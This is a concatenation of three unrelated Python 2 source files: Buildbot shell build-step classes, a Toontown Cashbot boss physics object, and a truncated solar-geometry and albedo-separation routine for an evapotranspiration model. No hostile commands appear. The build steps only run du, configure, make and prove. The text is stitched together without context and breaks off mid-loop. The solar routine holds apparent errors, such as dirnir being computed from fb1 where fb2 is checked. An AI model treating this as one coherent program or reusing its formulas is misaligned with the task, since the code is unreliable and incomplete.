"""
Get the current notion of the workdir. Note that this may change
between instantiation of the step and C{start}, as it is based on the
build's default workdir, and may even be C{None} before that point.
"""
return self.remote_kwargs['workdir']
def setCommand(self, command):
self.command = command
def _flattenList(self, mainlist, commands):
for x in commands:
if isinstance(x, (list, tuple)):
if x != []:
self._flattenList(mainlist, x)
else:
mainlist.append(x)
def describe(self, done=False):
desc = self._describe(done)
if self.descriptionSuffix:
desc = desc[:]
desc.extend(self.descriptionSuffix)
return desc
def _describe(self, done=False):
"""Return a list of short strings to describe this step, for the
status display. This uses the first few words of the shell command.
You can replace this by setting .description in your subclass, or by
overriding this method to describe the step better.
@type done: boolean
@param done: whether the command is complete or not, to improve the
way the command is described. C{done=False} is used
while the command is still running, so a single
imperfect-tense verb is appropriate ('compiling',
'testing', ...) C{done=True} is used when the command
has finished, and the default getText() method adds some
text, so a simple noun is appropriate ('compile',
'tests' ...)
"""
try:
if done and self.descriptionDone is not None:
return self.descriptionDone
if self.description is not None:
return self.description
# we may have no command if this is a step that sets its command
# name late in the game (e.g., in start())
if not self.command:
return ["???"]
words = self.command
if isinstance(words, (str, unicode)):
words = words.split()
try:
len(words)
except AttributeError:
# WithProperties and Property don't have __len__
return ["???"]
# flatten any nested lists
tmp = []
self._flattenList(tmp, words)
words = tmp
# strip instances and other detritus (which can happen if a
# description is requested before rendering)
words = [ w for w in words if isinstance(w, (str, unicode)) ]
if len(words) < 1:
return ["???"]
if len(words) == 1:
return ["'%s'" % words[0]]
if len(words) == 2:
return ["'%s" % words[0], "%s'" % words[1]]
return ["'%s" % words[0], "%s" % words[1], "...'"]
except:
log.err(failure.Failure(), "Error describing step")
return ["???"]
def setupEnvironment(self, cmd):
# merge in anything from Build.slaveEnvironment
# This can be set from a Builder-level environment, or from earlier
# BuildSteps. The latter method is deprecated and superceded by
# BuildProperties.
# Environment variables passed in by a BuildStep override
# those passed in at the Builder level.
slaveEnv = self.slaveEnvironment
if slaveEnv:
if cmd.args['env'] is None:
cmd.args['env'] = {}
fullSlaveEnv = slaveEnv.copy()
fullSlaveEnv.update(cmd.args['env'])
cmd.args['env'] = fullSlaveEnv
# note that each RemoteShellCommand gets its own copy of the
# dictionary, so we shouldn't be affecting anyone but ourselves.
def buildCommandKwargs(self, warnings):
kwargs = buildstep.LoggingBuildStep.buildCommandKwargs(self)
kwargs.update(self.remote_kwargs)
tmp = []
if isinstance(self.command, list):
self._flattenList(tmp, self.command)
else:
tmp = self.command
kwargs['command'] = tmp
# check for the usePTY flag
if kwargs.has_key('usePTY') and kwargs['usePTY'] != 'slave-config':
if self.slaveVersionIsOlderThan("svn", "2.7"):
warnings.append("NOTE: slave does not allow master to override usePTY\n")
del kwargs['usePTY']
# check for the interruptSignal flag
if kwargs.has_key('interruptSignal') and self.slaveVersionIsOlderThan("shell", "2.15"):
warnings.append("NOTE: slave does not allow master to specify interruptSignal\n")
del kwargs['interruptSignal']
return kwargs
def start(self):
# this block is specific to ShellCommands. subclasses that don't need
# to set up an argv array, an environment, or extra logfiles= (like
# the Source subclasses) can just skip straight to startCommand()
warnings = []
# create the actual RemoteShellCommand instance now
kwargs = self.buildCommandKwargs(warnings)
cmd = buildstep.RemoteShellCommand(**kwargs)
self.setupEnvironment(cmd)
self.startCommand(cmd, warnings)
class TreeSize(ShellCommand):
name = "treesize"
command = ["du", "-s", "-k", "."]
description = "measuring tree size"
descriptionDone = "tree size measured"
kib = None
def commandComplete(self, cmd):
out = cmd.logs['stdio'].getText()
m = re.search(r'^(\d+)', out)
if m:
self.kib = int(m.group(1))
self.setProperty("tree-size-KiB", self.kib, "treesize")
def evaluateCommand(self, cmd):
if cmd.didFail():
return FAILURE
if self.kib is None:
return WARNINGS # not sure how 'du' could fail, but whatever
return SUCCESS
def getText(self, cmd, results):
if self.kib is not None:
return ["treesize", "%d KiB" % self.kib]
return ["treesize", "unknown"]
class SetPropertyFromCommand(ShellCommand):
name = "setproperty"
renderables = [ 'property' ]
def __init__(self, property=None, extract_fn=None, strip=True, **kwargs):
self.property = property
self.extract_fn = extract_fn
self.strip = strip
if not ((property is not None) ^ (extract_fn is not None)):
config.error(
"Exactly one of property and extract_fn must be set")
ShellCommand.__init__(self, **kwargs)
self.property_changes = {}
def commandComplete(self, cmd):
if self.property:
if cmd.didFail():
return
result = cmd.logs['stdio'].getText()
if self.strip: result = result.strip()
propname = self.property
self.setProperty(propname, result, "SetProperty Step")
self.property_changes[propname] = result
else:
log = cmd.logs['stdio']
new_props = self.extract_fn(cmd.rc,
''.join(log.getChunks([STDOUT], onlyText=True)),
''.join(log.getChunks([STDERR], onlyText=True)))
for k,v in new_props.items():
self.setProperty(k, v, "SetProperty Step")
self.property_changes = new_props
def createSummary(self, log):
if self.property_changes:
props_set = [ "%s: %r" % (k,v)
for k,v in self.property_changes.items() ]
self.addCompleteLog('property changes', "\n".join(props_set))
def getText(self, cmd, results):
if len(self.property_changes) > 1:
return [ "%d properties set" % len(self.property_changes) ]
elif len(self.property_changes) == 1:
return [ "property '%s' set" % self.property_changes.keys()[0] ]
else:
# let ShellCommand describe
return ShellCommand.getText(self, cmd, results)
SetProperty = SetPropertyFromCommand
deprecatedModuleAttribute(Version("Buildbot", 0, 8, 8),
"It has been renamed to SetPropertyFromCommand",
"buildbot.steps.shell", "SetProperty")
class Configure(ShellCommand):
name = "configure"
haltOnFailure = 1
flunkOnFailure = 1
description = ["configuring"]
descriptionDone = ["configure"]
command = ["./configure"]
class StringFileWriter(pb.Referenceable):
"""
FileWriter class that just puts received data into a buffer.
Used to upload a file from slave for inline processing rather than
writing into a file on master.
"""
def __init__(self):
self.buffer = ""
def remote_write(self, data):
self.buffer += data
def remote_close(self):
pass
class WarningCountingShellCommand(ShellCommand):
renderables = [ 'suppressionFile' ]
warnCount = 0
warningPattern = '.*warning[: ].*'
# The defaults work for GNU Make.
directoryEnterPattern = (u"make.*: Entering directory "
u"[\u2019\"`'](.*)[\u2019'`\"]")
directoryLeavePattern = "make.*: Leaving directory"
suppressionFile = None
commentEmptyLineRe = re.compile(r"^\s*(\#.*)?$")
suppressionLineRe = re.compile(r"^\s*(.+?)\s*:\s*(.+?)\s*(?:[:]\s*([0-9]+)(?:-([0-9]+))?\s*)?$")
def __init__(self,
warningPattern=None, warningExtractor=None, maxWarnCount=None,
directoryEnterPattern=None, directoryLeavePattern=None,
suppressionFile=None, **kwargs):
# See if we've been given a regular expression to use to match
# warnings. If not, use a default that assumes any line with "warning"
# present is a warning. This may lead to false positives in some cases.
if warningPattern:
self.warningPattern = warningPattern
if directoryEnterPattern:
self.directoryEnterPattern = directoryEnterPattern
if directoryLeavePattern:
self.directoryLeavePattern = directoryLeavePattern
if suppressionFile:
self.suppressionFile = suppressionFile
if warningExtractor:
self.warningExtractor = warningExtractor
else:
self.warningExtractor = WarningCountingShellCommand.warnExtractWholeLine
self.maxWarnCount = maxWarnCount
# And upcall to let the base class do its work
ShellCommand.__init__(self, **kwargs)
self.suppressions = []
self.directoryStack = []
def addSuppression(self, suppressionList):
"""
This method can be used to add patters of warnings that should
not be counted.
It takes a single argument, a list of patterns.
Each pattern is a 4-tuple (FILE-RE, WARN-RE, START, END).
FILE-RE is a regular expression (string or compiled regexp), or None.
If None, the pattern matches all files, else only files matching the
regexp. If directoryEnterPattern is specified in the class constructor,
matching is against the full path name, eg. src/main.c.
WARN-RE is similarly a regular expression matched against the
text of the warning, or None to match all warnings.
START and END form an inclusive line number range to match against. If
START is None, there is no lower bound, similarly if END is none there
is no upper bound."""
for fileRe, warnRe, start, end in suppressionList:
if fileRe != None and isinstance(fileRe, basestring):
fileRe = re.compile(fileRe)
if warnRe != None and isinstance(warnRe, basestring):
warnRe = re.compile(warnRe)
self.suppressions.append((fileRe, warnRe, start, end))
def warnExtractWholeLine(self, line, match):
"""
Extract warning text as the whole line.
No file names or line numbers."""
return (None, None, line)
def warnExtractFromRegexpGroups(self, line, match):
"""
Extract file name, line number, and warning text as groups (1,2,3)
of warningPattern match."""
file = match.group(1)
lineNo = match.group(2)
if lineNo != None:
lineNo = int(lineNo)
text = match.group(3)
return (file, lineNo, text)
def maybeAddWarning(self, warnings, line, match):
if self.suppressions:
(file, lineNo, text) = self.warningExtractor(self, line, match)
lineNo = lineNo and int(lineNo)
if file != None and file != "" and self.directoryStack:
currentDirectory = '/'.join(self.directoryStack)
if currentDirectory != None and currentDirectory != "":
file = "%s/%s" % (currentDirectory, file)
# Skip adding the warning if any suppression matches.
for fileRe, warnRe, start, end in self.suppressions:
if not (file == None or fileRe == None or fileRe.match(file)):
continue
if not (warnRe == None or warnRe.search(text)):
continue
if not ((start == None and end == None) or
(lineNo != None and start <= lineNo and end >= lineNo)):
continue
return
warnings.append(line)
self.warnCount += 1
def start(self):
if self.suppressionFile == None:
return ShellCommand.start(self)
self.myFileWriter = StringFileWriter()
args = {
'slavesrc': self.suppressionFile,
'workdir': self.getWorkdir(),
'writer': self.myFileWriter,
'maxsize': None,
'blocksize': 32*1024,
}
cmd = buildstep.RemoteCommand('uploadFile', args, ignore_updates=True)
d = self.runCommand(cmd)
d.addCallback(self.uploadDone)
d.addErrback(self.failed)
def uploadDone(self, dummy):
lines = self.myFileWriter.buffer.split("\n")
del(self.myFileWriter)
list = []
for line in lines:
if self.commentEmptyLineRe.match(line):
continue
match = self.suppressionLineRe.match(line)
if (match):
file, test, start, end = match.groups()
if (end != None):
end = int(end)
if (start != None):
start = int(start)
if end == None:
end = start
list.append((file, test, start, end))
self.addSuppression(list)
return ShellCommand.start(self)
def createSummary(self, log):
"""
Match log lines against warningPattern.
Warnings are collected into another log for this step, and the
build-wide 'warnings-count' is updated."""
self.warnCount = 0
# Now compile a regular expression from whichever warning pattern we're
# using
wre = self.warningPattern
if isinstance(wre, str):
wre = re.compile(wre)
directoryEnterRe = self.directoryEnterPattern
if (directoryEnterRe != None
and isinstance(directoryEnterRe, basestring)):
directoryEnterRe = re.compile(directoryEnterRe)
directoryLeaveRe = self.directoryLeavePattern
if (directoryLeaveRe != None
and isinstance(directoryLeaveRe, basestring)):
directoryLeaveRe = re.compile(directoryLeaveRe)
# Check if each line in the output from this command matched our
# warnings regular expressions. If did, bump the warnings count and
# add the line to the collection of lines with warnings
warnings = []
# TODO: use log.readlines(), except we need to decide about stdout vs
# stderr
for line in log.getText().split("\n"):
if directoryEnterRe:
match = directoryEnterRe.search(line)
if match:
self.directoryStack.append(match.group(1))
continue
if (directoryLeaveRe and
self.directoryStack and
directoryLeaveRe.search(line)):
self.directoryStack.pop()
continue
match = wre.match(line)
if match:
self.maybeAddWarning(warnings, line, match)
# If there were any warnings, make the log if lines with warnings
# available
if self.warnCount:
self.addCompleteLog("warnings (%d)" % self.warnCount,
"\n".join(warnings) + "\n")
warnings_stat = self.step_status.getStatistic('warnings', 0)
self.step_status.setStatistic('warnings', warnings_stat + self.warnCount)
old_count = self.getProperty("warnings-count", 0)
self.setProperty("warnings-count", old_count + self.warnCount, "WarningCountingShellCommand")
def evaluateCommand(self, cmd):
if ( cmd.didFail() or
( self.maxWarnCount != None and self.warnCount > self.maxWarnCount ) ):
return FAILURE
if self.warnCount:
return WARNINGS
return SUCCESS
class Compile(WarningCountingShellCommand):
name = "compile"
haltOnFailure = 1
flunkOnFailure = 1
description = ["compiling"]
descriptionDone = ["compile"]
command = ["make", "all"]
class Test(WarningCountingShellCommand):
name = "test"
warnOnFailure = 1
description = ["testing"]
descriptionDone = ["test"]
command = ["make", "test"]
def setTestResults(self, total=0, failed=0, passed=0, warnings=0):
"""
Called by subclasses to set the relevant statistics; this actually
adds to any statistics already present
"""
total += self.step_status.getStatistic('tests-total', 0)
self.step_status.setStatistic('tests-total', total)
failed += self.step_status.getStatistic('tests-failed', 0)
self.step_status.setStatistic('tests-failed', failed)
warnings += self.step_status.getStatistic('tests-warnings', 0)
self.step_status.setStatistic('tests-warnings', warnings)
passed += self.step_status.getStatistic('tests-passed', 0)
self.step_status.setStatistic('tests-passed', passed)
def describe(self, done=False):
description = WarningCountingShellCommand.describe(self, done)
if done:
description = description[:] # make a private copy
if self.step_status.hasStatistic('tests-total'):
total = self.step_status.getStatistic("tests-total", 0)
failed = self.step_status.getStatistic("tests-failed", 0)
passed = self.step_status.getStatistic("tests-passed", 0)
warnings = self.step_status.getStatistic("tests-warnings", 0)
if not total:
total = failed + passed + warnings
if total:
description.append('%d tests' % total)
if passed:
description.append('%d passed' % passed)
if warnings:
description.append('%d warnings' % warnings)
if failed:
description.append('%d failed' % failed)
return description
class PerlModuleTest(Test):
command=["prove", "--lib", "lib", "-r", "t"]
total = 0
def evaluateCommand(self, cmd):
# Get stdio, stripping pesky newlines etc.
lines = map(
lambda line : line.replace('\r\n','').replace('\r','').replace('\n',''),
self.getLog('stdio').readlines()
)
total = 0
passed = 0
failed = 0
rc = SUCCESS
if cmd.didFail():
rc = FAILURE
# New version of Test::Harness?
if "Test Summary Report" in lines:
test_summary_report_index = lines.index("Test Summary Report")
del lines[0:test_summary_report_index + 2]
re_test_result = re.compile("^Result: (PASS|FAIL)$|Tests: \d+ Failed: (\d+)\)|Files=\d+, Tests=(\d+)")
mos = map(lambda line: re_test_result.search(line), lines)
test_result_lines = [mo.groups() for mo in mos if mo]
for line in test_result_lines:
if line[0] == 'FAIL':
rc = FAILURE
if line[1]:
failed += int(line[1])
if line[2]:
total = int(line[2])
else: # Nope, it's the old version
re_test_result = re.compile("^(All tests successful)|(\d+)/(\d+) subtests failed|Files=\d+, Tests=(\d+),")
mos = map(lambda line: re_test_result.search(line), lines)
test_result_lines = [mo.groups() for mo in mos if mo]
if test_result_lines:
test_result_line = test_result_lines[0]
success = test_result_line[0]
if success:
failed = 0
test_totals_line = test_result_lines[1]
total_str = test_totals_line[3]
else:
failed_str = test_result_line[1]
failed = int(failed_str)
total_str = test_result_line[2]
rc = FAILURE
total = int(total_str)
warnings = 0
if self.warningPattern:
wre = self.warningPattern
if isinstance(wre, str):
wre = re.compile(wre)
warnings = len([l for l in lines if wre.search(l)])
# Because there are two paths that are used to determine
# the success/fail result, I have to modify it here if
# there were warnings.
if rc == SUCCESS and warnings:
rc = WARNINGS
if total:
passed = total - failed
self.setTestResults(total=total, failed=failed, passed=passed,
warnings=warnings)
return rc
| |
from pandac.PandaModules import *
from direct.interval.IntervalGlobal import *
from direct.directnotify import DirectNotifyGlobal
from direct.distributed import DistributedSmoothNode
from toontown.toonbase import ToontownGlobals
from otp.otpbase import OTPGlobals
from direct.fsm import FSM
from direct.task import Task
smileyDoId = 1
class DistributedCashbotBossObject(DistributedSmoothNode.DistributedSmoothNode, FSM.FSM):
notify = DirectNotifyGlobal.directNotify.newCategory('DistributedCashbotBossObject')
wantsWatchDrift = 1
def __init__(self, cr):
DistributedSmoothNode.DistributedSmoothNode.__init__(self, cr)
FSM.FSM.__init__(self, 'DistributedCashbotBossObject')
self.boss = None
self.avId = 0
self.craneId = 0
self.cleanedUp = 0
self.collisionNode = CollisionNode('object')
self.collisionNode.setIntoCollideMask(ToontownGlobals.PieBitmask | OTPGlobals.WallBitmask | ToontownGlobals.CashbotBossObjectBitmask | OTPGlobals.CameraBitmask)
self.collisionNode.setFromCollideMask(ToontownGlobals.PieBitmask | OTPGlobals.FloorBitmask)
self.collisionNodePath = NodePath(self.collisionNode)
self.physicsActivated = 0
self.toMagnetSoundInterval = Sequence()
self.hitFloorSoundInterval = Sequence()
self.hitBossSfx = loader.loadSfx('phase_5/audio/sfx/AA_drop_safe_miss.ogg')
self.hitBossSoundInterval = SoundInterval(self.hitBossSfx)
self.touchedBossSfx = loader.loadSfx('phase_5/audio/sfx/AA_drop_sandbag.ogg')
self.touchedBossSoundInterval = SoundInterval(self.touchedBossSfx, duration=0.8)
self.lerpInterval = None
return
def disable(self):
self.cleanup()
self.stopSmooth()
DistributedSmoothNode.DistributedSmoothNode.disable(self)
def cleanup(self):
if self.cleanedUp:
return
else:
self.cleanedUp = 1
self.demand('Off')
self.detachNode()
self.toMagnetSoundInterval.finish()
self.hitFloorSoundInterval.finish()
self.hitBossSoundInterval.finish()
self.touchedBossSoundInterval.finish()
del self.toMagnetSoundInterval
del self.hitFloorSoundInterval
del self.hitBossSoundInterval
del self.touchedBossSoundInterval
self.boss = None
return
def setupPhysics(self, name):
an = ActorNode('%s-%s' % (name, self.doId))
anp = NodePath(an)
if not self.isEmpty():
self.reparentTo(anp)
NodePath.assign(self, anp)
self.physicsObject = an.getPhysicsObject()
self.setTag('object', str(self.doId))
self.collisionNodePath.reparentTo(self)
self.handler = PhysicsCollisionHandler()
self.handler.addCollider(self.collisionNodePath, self)
self.collideName = self.uniqueName('collide')
self.handler.addInPattern(self.collideName + '-%in')
self.handler.addAgainPattern(self.collideName + '-%in')
self.watchDriftName = self.uniqueName('watchDrift')
def activatePhysics(self):
if not self.physicsActivated:
self.boss.physicsMgr.attachPhysicalNode(self.node())
base.cTrav.addCollider(self.collisionNodePath, self.handler)
self.physicsActivated = 1
self.accept(self.collideName + '-floor', self.__hitFloor)
self.accept(self.collideName + '-goon', self.__hitGoon)
self.acceptOnce(self.collideName + '-headTarget', self.__hitBoss)
self.accept(self.collideName + '-dropPlane', self.__hitDropPlane)
def deactivatePhysics(self):
if self.physicsActivated:
self.boss.physicsMgr.removePhysicalNode(self.node())
base.cTrav.removeCollider(self.collisionNodePath)
self.physicsActivated = 0
self.ignore(self.collideName + '-floor')
self.ignore(self.collideName + '-goon')
self.ignore(self.collideName + '-headTarget')
self.ignore(self.collideName + '-dropPlane')
def hideShadows(self):
pass
def showShadows(self):
pass
def stashCollisions(self):
self.collisionNodePath.stash()
def unstashCollisions(self):
self.collisionNodePath.unstash()
def __hitFloor(self, entry):
if self.state == 'Dropped' or self.state == 'LocalDropped':
self.d_hitFloor()
self.demand('SlidingFloor', localAvatar.doId)
def __hitGoon(self, entry):
if self.state == 'Dropped' or self.state == 'LocalDropped':
goonId = int(entry.getIntoNodePath().getNetTag('doId'))
goon = self.cr.doId2do.get(goonId)
if goon:
self.doHitGoon(goon)
def doHitGoon(self, goon):
pass
def __hitBoss(self, entry):
if (self.state == 'Dropped' or self.state == 'LocalDropped') and self.craneId != self.boss.doId:
vel = self.physicsObject.getVelocity()
vel = self.crane.root.getRelativeVector(render, vel)
vel.normalize()
impact = vel[1]
if impact >= self.getMinImpact():
print 'hit! %s' % impact
self.hitBossSoundInterval.start()
self.doHitBoss(impact)
else:
self.touchedBossSoundInterval.start()
print '--not hard enough: %s' % impact
def doHitBoss(self, impact):
self.d_hitBoss(impact)
def __hitDropPlane(self, entry):
self.notify.info('%s fell out of the world.' % self.doId)
self.fellOut()
def fellOut(self):
raise StandardError, 'fellOut unimplented'
def getMinImpact(self):
return 0
def __watchDrift(self, task):
v = self.physicsObject.getVelocity()
if abs(v[0]) < 0.0001 and abs(v[1]) < 0.0001:
self.d_requestFree()
self.demand('Free')
return Task.cont
def prepareGrab(self):
pass
def prepareRelease(self):
pass
def setBossCogId(self, bossCogId):
self.bossCogId = bossCogId
self.boss = base.cr.doId2do[bossCogId]
def setObjectState(self, state, avId, craneId):
if state == 'G':
self.demand('Grabbed', avId, craneId)
elif state == 'D':
if self.state != 'Dropped':
self.demand('Dropped', avId, craneId)
elif state == 's':
if self.state != 'SlidingFloor':
self.demand('SlidingFloor', avId)
elif state == 'F':
self.demand('Free')
else:
self.notify.error('Invalid state from AI: %s' % state)
def d_requestGrab(self):
self.sendUpdate('requestGrab')
def rejectGrab(self):
if self.state == 'LocalGrabbed':
self.demand('LocalDropped', self.avId, self.craneId)
def d_requestDrop(self):
self.sendUpdate('requestDrop')
def d_hitFloor(self):
self.sendUpdate('hitFloor')
def d_requestFree(self):
self.sendUpdate('requestFree', [self.getX(),
self.getY(),
self.getZ(),
self.getH()])
def d_hitBoss(self, impact):
self.sendUpdate('hitBoss', [impact])
def defaultFilter(self, request, args):
if self.boss == None:
raise FSM.RequestDenied, request
return FSM.FSM.defaultFilter(self, request, args)
def enterOff(self):
self.detachNode()
if self.lerpInterval:
self.lerpInterval.finish()
self.lerpInterval = None
return
def exitOff(self):
self.reparentTo(render)
def enterLocalGrabbed(self, avId, craneId):
self.avId = avId
self.craneId = craneId
self.crane = self.cr.doId2do.get(craneId)
self.hideShadows()
self.prepareGrab()
self.crane.grabObject(self)
def exitLocalGrabbed(self):
if self.newState != 'Grabbed':
self.crane.dropObject(self)
self.prepareRelease()
del self.crane
self.showShadows()
def enterGrabbed(self, avId, craneId):
if self.oldState == 'LocalGrabbed':
if craneId == self.craneId:
return
else:
self.crane.dropObject(self)
self.prepareRelease()
self.avId = avId
self.craneId = craneId
self.crane = self.cr.doId2do.get(craneId)
self.hideShadows()
self.prepareGrab()
self.crane.grabObject(self)
def exitGrabbed(self):
self.crane.dropObject(self)
self.prepareRelease()
self.showShadows()
del self.crane
def enterLocalDropped(self, avId, craneId):
self.avId = avId
self.craneId = craneId
self.crane = self.cr.doId2do.get(craneId)
self.activatePhysics()
self.startPosHprBroadcast()
self.hideShadows()
self.handler.setStaticFrictionCoef(0)
self.handler.setDynamicFrictionCoef(0)
def exitLocalDropped(self):
if self.newState != 'SlidingFloor' and self.newState != 'Dropped':
self.deactivatePhysics()
self.stopPosHprBroadcast()
del self.crane
self.showShadows()
def enterDropped(self, avId, craneId):
self.avId = avId
self.craneId = craneId
self.crane = self.cr.doId2do.get(craneId)
if self.avId == base.localAvatar.doId:
self.activatePhysics()
self.startPosHprBroadcast()
self.handler.setStaticFrictionCoef(0)
self.handler.setDynamicFrictionCoef(0)
else:
self.startSmooth()
self.hideShadows()
def exitDropped(self):
if self.avId == base.localAvatar.doId:
if self.newState != 'SlidingFloor':
self.deactivatePhysics()
self.stopPosHprBroadcast()
else:
self.stopSmooth()
del self.crane
self.showShadows()
def enterSlidingFloor(self, avId):
self.avId = avId
if self.lerpInterval:
self.lerpInterval.finish()
self.lerpInterval = None
if self.avId == base.localAvatar.doId:
self.activatePhysics()
self.startPosHprBroadcast()
self.handler.setStaticFrictionCoef(0.9)
self.handler.setDynamicFrictionCoef(0.5)
if self.wantsWatchDrift:
taskMgr.add(self.__watchDrift, self.watchDriftName)
else:
self.startSmooth()
self.hitFloorSoundInterval.start()
return
def exitSlidingFloor(self):
if self.avId == base.localAvatar.doId:
taskMgr.remove(self.watchDriftName)
self.deactivatePhysics()
self.stopPosHprBroadcast()
else:
self.stopSmooth()
def enterFree(self):
self.avId = 0
self.craneId = 0
def exitFree(self):
pass
| |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 1 15:32:10 2017
@author: mschull
"""
import numpy as np
import math
from astropy.convolution import convolve
from astropy.convolution import Gaussian2DKernel, Box2DKernel
# script imports
# imports
def to_jd(datetime):
"""
Converts a given datetime object to Julian date.
Algorithm is copied from https://en.wikipedia.org/wiki/Julian_day
All variable names are consistent with the notation on the wiki page.
Parameters
----------
fmt
dt: datetime
Datetime object to convert to MJD
Returns
-------
jd: float
"""
dt = datetime
a = math.floor((14. - dt.month) / 12.)
y = dt.year + 4800. - a
m = dt.month + 12. * a - 3.
jdn = dt.day + math.floor((153. * m + 2.) / 5.) + 365. * y + math.floor(y / 4.) - math.floor(y / 100.) + math.floor(
y / 400.) - 32045.
jd = jdn + (dt.hour - 12.) / 24. + dt.minute / 1440. + dt.second / 86400. + dt.microsecond / 86400000000.
return jd
# ;
# ; PROCEDURE: SUNSET_SUNRISE
# ;
# ; CALLED BY: DISALEXI (found at end of file)
# ;
# ; PURPOSE:
# ; Computes solar time variables following Campbell & Norman 1998
# ;
# ;======================================================================================================
# PRO sunset_sunrise, julian, lon, lat, time_t
#
# COMMON com_time, t_rise, t_end, zs
def sunset_sunrise(dt, lon, lat, time_t):
julian = to_jd(dt)
# Sunrise time
julian_ = julian + (time_t / 24.)
j_cen = ((julian_ + 0.5 - 2451545.) / 36525.)
lon_sun = (280.46646 + j_cen * (36000.76983 + j_cen * 0.0003032) % 360.) - 360.
an_sun = 357.52911 + j_cen * (35999.05029 - 0.0001537 * j_cen)
ecc = 0.016708634 - j_cen * (0.000042037 + 0.0000001267 * j_cen)
ob_ecl = 23. + (26. + ((21.448 - j_cen * (46.815 + j_cen * (0.00059 - j_cen * 0.001813)))) / 60.) / 60.
ob_corr = ob_ecl + 0.00256 * np.cos(np.deg2rad(125.04 - 1934.136 * j_cen))
var_y = np.tan(np.deg2rad(ob_corr / 2.)) * np.tan(np.deg2rad(ob_corr / 2.))
eq_t = 4. * np.rad2deg(var_y * np.sin(np.deg2rad(2. * lon_sun)) - 2. * ecc * np.sin(np.deg2rad(an_sun))
+ 4. * ecc * var_y * np.sin(np.deg2rad(an_sun)) * np.cos(
np.deg2rad(2. * lon_sun)) - 0.5 * var_y *
var_y * np.sin(np.deg2rad(4. * lon_sun)) - 1.25 * ecc * ecc * np.sin(np.deg2rad(2 * an_sun)))
sun_eq = np.sin(np.deg2rad(an_sun)) * (1.914602 - j_cen * (0.004817 + 0.000014 * j_cen)) + \
np.sin(np.deg2rad(2. * an_sun)) * (0.019993 - 0.000101 * j_cen) + np.sin(
np.deg2rad(3. * an_sun)) * 0.000289
sun_true = sun_eq + lon_sun
sun_app = sun_true - 0.00569 - 0.00478 * np.sin(np.deg2rad((125.04 - 1934.136 * j_cen)))
d = np.rad2deg((np.arcsin(np.sin(np.deg2rad(ob_corr)) * np.sin(np.deg2rad(sun_app)))))
ha_t = np.rad2deg(np.arccos(
np.cos(np.deg2rad(90.833)) / (np.cos(lat) * np.cos(np.deg2rad(d))) - np.tan(lat) * np.tan(np.deg2rad(d))))
t_noon = (720. - 4. * np.rad2deg(lon) - eq_t) / 1440. * 24.
t_rise = ((t_noon / 24.) - (ha_t * 4. / 1440.)) * 24.
t_end = ((t_noon / 24.) + (ha_t * 4. / 1440.)) * 24.
ts_time = ((time_t / 24. * 1440 + eq_t + 4. * np.rad2deg(lon)) % 1440.)
ts_time[ts_time > 1440.] = ts_time[ts_time > 1440.] - 1440.
w = ts_time / 4. + 180.
w[ts_time / 4. >= 0] = ts_time[ts_time / 4. >= 0.] / 4. - 180.
zs = np.arccos(
(np.sin(lat) * np.sin(np.deg2rad(d))) + (np.cos(lat) * np.cos(np.deg2rad(d)) * np.cos(np.deg2rad(w))))
return t_rise, t_end, zs
# PRO albedo_separation, albedo, Rs_1, F, fc, aleafv, aleafn, aleafl, adeadv, adeadn, adeadl, z, t_air, zs, control
#
# COMMON com_alb, Rs_c, Rs_s, albedo_c, albedo_s, e_atm, rsoilv_itr, fg_itr
#
# ;*******************************************************************************************************************
# ; Compute Solar Components and atmospheric properties (Campbell & Norman 1998)
def albedo_separation(albedo, Rs_1, F, fc, aleafv, aleafn, aleafl, adeadv, adeadn, adeadl, z, t_air, zs, control):
# ; Compute Solar Components and atmospheric properties (Campbell & Norman 1998)
# DAYTIME
# Calculate potential (clear-sky) VIS and NIR solar components
airmas = (np.sqrt(np.cos(zs) ** 2 + .0025) - np.cos(zs)) / .00125 # Correct for curvature of atmos in airmas
zs_temp = zs.copy()
zs_temp[np.rad2deg(zs) >= 89.5] = np.deg2rad(89.5)
ind = np.rad2deg(zs) < 89.5
airmas[ind] = (airmas[ind] - 2.8 / (
90. - np.rad2deg(zs_temp[ind])) ** 2.) # Correct for refraction(good up to 89.5 deg.)
potbm1 = 600. * np.exp(-.160 * airmas)
potvis = (potbm1 + (600. - potbm1) * .4) * np.cos(zs)
potdif = (600. - potbm1) * .4 * np.cos(zs)
uu = 1.0 / np.cos(zs)
uu[uu <= 0.01] = 0.01
axlog = np.log10(uu)
a = 10 ** (-1.195 + .4459 * axlog - .0345 * axlog * axlog)
watabs = 1320. * a
potbm2 = 720. * np.exp(-.05 * airmas) - watabs
evaL = (720. - potbm2 - watabs) * .54 * np.cos(zs)
potnir = evaL + potbm2 * np.cos(zs)
fclear = Rs_1 / (potvis + potnir)
fclear[fclear > 1.] = 1.
fclear[np.cos(zs) <= 0.01] = 1.
fclear[fclear <= 0.01] = 0.01
# Partition SDN into VIS and NIR
fvis = potvis / (potvis + potnir)
fnir = potnir / (potvis + potnir)
# Estimate direct beam and diffuse fraction in VIS and NIR wavebands
fb1 = potbm1 * np.cos(zs) / potvis
fb2 = potbm2 * np.cos(zs) / potnir
ratiox = fclear.copy()
ratiox[fclear > 0.9] = 0.9
dirvis = fb1 * (1. - ((.9 - ratiox) / .7) ** .6667)
ind = dirvis >= fb1
dirvis[ind] = fb1[ind]
ratiox = fclear.copy()
ratiox[fclear > 0.88] = 0.88
dirnir = fb1 * (1. - ((.88 - ratiox) / .68) ** .6667)
ind = dirnir >= fb2
dirnir[ind] = fb1[ind]
ind = np.logical_and((dirvis < 0.01), (dirnir > 0.01))
dirvis[ind] = 0.011
ind = np.logical_and((dirnir < 0.01), (dirvis > 0.01))
dirnir[ind] = 0.011
difvis = 1. - dirvis
difnir = 1. - dirnir
# Correction for NIGHTIME
ind = np.cos(zs) <= 0.01
fvis[ind] = 0.5
fnir[ind] = 0.5
difvis[ind] = 1.
difnir[ind] = 1.
dirvis[ind] = 0.
dirnir[ind] = 0.
Rs0 = potvis + potnir
Rs0[ind] = 0.
# apparent emissivity (Sedlar and Hock, 2009: Cryosphere 3:75-84)
e_atm = 1. - (0.2811 * (
np.exp(-0.0003523 * ((t_air - 273.16) ** 2.)))) # atmospheric emissivity (clear-sly) Idso and Jackson (1969)
fclear[Rs0 <= 50.] = 1.
# **********************************************
# Compute Albedo
ratio_soil = 2.
if control == 1:
rsoilv = np.tile(0.12, np.shape(F))
fg = np.tile(1., np.shape(albedo))
z_inter = 9
# else:
# rsoilv = rsoilv_itr
# fg = fg_itr
# z_inter = 0.
for zzz in range(z_inter + 1): # +1 to do what IDL does
rsoiln = rsoilv * ratio_soil
